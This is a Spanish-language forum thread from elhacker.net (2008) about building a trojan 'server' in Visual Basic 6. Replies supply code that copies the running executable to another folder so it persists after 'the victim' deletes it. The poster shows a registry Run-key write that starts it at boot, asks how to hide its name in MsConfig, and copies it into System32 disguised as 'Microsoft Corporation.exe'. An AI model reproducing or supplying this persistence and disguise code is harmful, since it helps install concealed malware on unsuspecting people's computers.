elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Copiar Server en Otra carPeta
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Copiar Server en Otra carPeta  (Leído 3,138 veces)
illuminat3d

Desconectado Desconectado

Mensajes: 231



Ver Perfil WWW
Copiar Server en Otra carPeta
« en: 11 Octubre 2008, 15:14 pm »

Bueno quiero que al ejecutar el server que estoy haciendo se borre y se copie en alguna carPeta no encontre code por ningun lado, si alguien me puede ayudar..

Saludos!


En línea

& eDu &


Desconectado Desconectado

Mensajes: 580



Ver Perfil
Re: Copiar Server en Otra carPeta
« Respuesta #1 en: 11 Octubre 2008, 16:18 pm »

Mira dale doble click al form del server y pon:


Código
  1. FileCopy app.path & "\" & app.exename & ".exe","aqui la direccion de destino"

Dejalo asi, y si la victima borra el primer servidor, el servidor que se ha copiado en otra carpeta sigue aun en el PC.


En línea

illuminat3d

Desconectado Desconectado

Mensajes: 231



Ver Perfil WWW
Re: Copiar Server en Otra carPeta
« Respuesta #2 en: 11 Octubre 2008, 16:22 pm »

Gracias ErMoja!

Se te agradece muxho

Saludos!

Editado : Por cierto como hago para que se copie en otro nombre.. mira yo lo que puse fue estas dos cosas el run y el copy k me acabas de dar :

FileCopy app.path & "\" & app.exename & ".exe","aqui la direccion de destino"

E el Copy como hago para que se copie con otro name? en vez del que tiene? porque app.exename <- copiara el mismo name del archivo enviado

En el Run tengo :

Dim Registro As Object
Dim Ruta As String
Dim CadenaNueva As String
Dim ContenidoCadena As String
ContenidoCadena = App.Path & "\" & App.EXEName & ".exe"
CadenaNueva = "\Java"
Ruta = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" & CadenaNueva
Set Registro = CreateObject("WScript.Shell")
Registro.RegWrite Ruta, ContenidoCadena

Como hago para que en el MsConfig salga algun otro name que no sea el del archivo enviado!?

Saludos y graciaS!
« Última modificación: 11 Octubre 2008, 16:26 pm por Sharki » En línea

Spider-Net


Desconectado Desconectado

Mensajes: 1.165


Un gran poder conlleva una gran responsabilidad


Ver Perfil WWW
Re: Copiar Server en Otra carPeta
« Respuesta #3 en: 11 Octubre 2008, 16:52 pm »

 :-\

Código
  1. FileCopy App.path & "\" & App.EXEName & ".exe", "aqui la direccion de destino\Nombredestino.exe"
  2.  

Podrías investigar algún código o simplemente buscar en google como se usa esa función... No es tan difícil..
En línea

illuminat3d

Desconectado Desconectado

Mensajes: 231



Ver Perfil WWW
Re: Copiar Server en Otra carPeta
« Respuesta #4 en: 11 Octubre 2008, 16:56 pm »

:-\

Código
  1. FileCopy App.path & "\" & App.EXEName & ".exe", "aqui la direccion de destino\Nombredestino.exe"
  2.  

Podrías investigar algún código o simplemente buscar en google como se usa esa función... No es tan difícil..

=0 que faciL lo siento por no busCar se te agradece Spider

Saludos!
En línea

illuminat3d

Desconectado Desconectado

Mensajes: 231



Ver Perfil WWW
Re: Copiar Server en Otra carPeta
« Respuesta #5 en: 11 Octubre 2008, 17:14 pm »

Me sale error que n ose encontro el archivo =S

FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\WINDOWS\System32\Microsoft Corporation.exe"

Osea que no se copia con ese nombre si no.. intenta encontrar el Archivo Microsoft Corportaion

Saludos!
En línea

& eDu &


Desconectado Desconectado

Mensajes: 580



Ver Perfil
Re: Copiar Server en Otra carPeta
« Respuesta #6 en: 11 Octubre 2008, 17:16 pm »

Tienes que tener el programa compilado en .exe es decir ya tiene que estar para que lo pueda ejecutar otras personas, si lo estas probando con el vb6 no te lo va a copiar xDD
En línea

ssccaann43 ©


Desconectado Desconectado

Mensajes: 792


¬¬


Ver Perfil
Re: Copiar Server en Otra carPeta
« Respuesta #7 en: 11 Octubre 2008, 17:20 pm »

Amigo, debes crear el .EXE y ejecutarlo. Desde el Visual no funcionará.  :¬¬
En línea

- Miguel Núñez
Todos tenemos derechos a ser estupidos, pero algunos abusan de ese privilegio...
"I like ^TiFa^"
illuminat3d

Desconectado Desconectado

Mensajes: 231



Ver Perfil WWW
Re: Copiar Server en Otra carPeta
« Respuesta #8 en: 11 Octubre 2008, 17:26 pm »

Jojo lo siento ok!

Saludos!
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines